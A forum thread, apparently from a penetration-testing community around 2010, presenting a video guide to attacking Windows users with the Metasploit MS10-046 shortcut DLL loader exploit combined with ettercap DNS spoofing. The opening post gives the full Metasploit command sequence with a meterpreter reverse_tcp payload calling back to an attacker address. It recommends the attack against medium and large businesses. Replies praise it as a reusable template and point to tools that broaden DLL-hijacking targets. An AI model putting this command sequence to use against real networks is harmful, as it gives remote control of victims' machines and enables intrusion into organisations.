If this is your first visit, be sure to
check out the Forum Rules by clicking the
link above. You may have to register
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.

[Video]MS10-046 Metasploit + ettercap DNS Spoof

I realize there are a few mistakes in this video, I was nervous and slipped up. Specifically how reverse_tcp works.

To explain the mistake, I mentioned in the video that reverse_tcp creates a socket on the victim machine and our attacking machine will connect to that socket. This is actually how bind_tcp works. reverse_tcp creates a socket on the attacking machine and lets the victim machine connect as a client. Just wanted to make sure it's clear I know the difference I realized when I recorded it I had made a mistake, as you can probably tell by the mumbling, but I just went with it.

I believe that this attack would work really well on medium and large sized businesses, if you can get access to the network either via wifi or by physical means. The redirect to the UNC path looks very scary, but I think most users will chalk it up to terrible IT support or weird phantom network issues.

I appreciate any criticism, this is the first video I've made and really the first time I've posted a guide on here.

Commands:
MSF:

Code:

use windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST ATTACKER_IP_ADDR
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ATTACKER_IP_ADDR
exploit

Re: [Video]MS10-046 Metasploit + ettercap DNS Spoof

Pretty nice
The true reason I like it is that you used the dns_spoof from ettercap to make it easier, most people just go to the specific IP which reduces the chances that it will work in a real like demo.
You did some nice explaining even for the basic stuff :P

Congratulations !

Back|track giving machine guns to monkeys since 2007 !

Do not read theWiki, most your questions will not be answered there !Do not take a look at the: Forum Rules!

Thanks, I figured people would like to see a real world example. The MSF module could be swapped out for any browser autopwn attack for this to work, so this is kind of like a template for the other browser autopwn. I'd like to incorporate some sort of ettercap filter that will allow the user, once they've been poisoned and exploited, to be able to use the internet again. This would really make this feel more "complete" to me. I'm not sure how I'd be able to do it, but I didn't really know how to use ettercap the other day and here I am.

[edit] thanks Archangel-Amael, should of just edited it myself.
Not bumping, but just wanted to post some relevant information related to this exploit in MSF.

Basically what it boils down to is that the vulnerability of ms10-046 is not just IE, it's a poor programing practice involving importing external DLL files when a program opens a file that is associated with it. iTunes was vulnerable till about last week. HDM released a tool that fuzzes/enumerates programs installed on your machine for these vulnerabilities automatically and creates malicious dlls that you can import into MSF. So imagine what I did in the video, but now the attack vector has broaded due to the amount of vendors that seem to have this vulnerability in their products!

If anyone has played with it yet, please post! I'm going to be messing around with this when I get home from work!

Last edited by g3ksan; 08-24-2010 at 12:29 AM.

This is the sixth time we have created a thread about it... and we have become exceedingly efficient at it.